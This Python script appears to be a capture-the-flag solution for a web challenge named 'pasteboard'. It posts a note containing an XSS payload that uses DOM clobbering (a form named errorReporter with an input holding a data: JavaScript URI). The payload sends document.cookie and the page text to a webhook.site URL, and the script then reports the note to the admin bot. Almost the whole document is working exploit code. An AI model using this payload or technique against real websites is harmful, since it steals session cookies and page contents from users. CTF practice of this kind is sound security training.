import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Best approach: Use a public JavaScript hosting service or use data: URI
# The form method creates window.errorReporter as an HTMLFormElement
# with errorReporter.path as an HTMLInputElement
# and errorReporter.path.value as the string value

payload = f'''<form id="errorReporter">
<input name="path" value="data:text/javascript,fetch('{WEBHOOK}?cookie='+encodeURIComponent(document.cookie)+'&body='+encodeURIComponent(document.body.innerText))">
</form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

print("[*] Payload that will be sent:")
print(payload)
print()

session = requests.Session()
response = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Exploit", "body": payload},
    allow_redirects=False
)

if response.status_code == 302:
    location = response.headers.get('Location')
    print(f"[+] Note URL: {BASE_URL}{location}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    print(f"[+] Report status: {report.status_code}")
    print(f"[*] Check webhook: https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")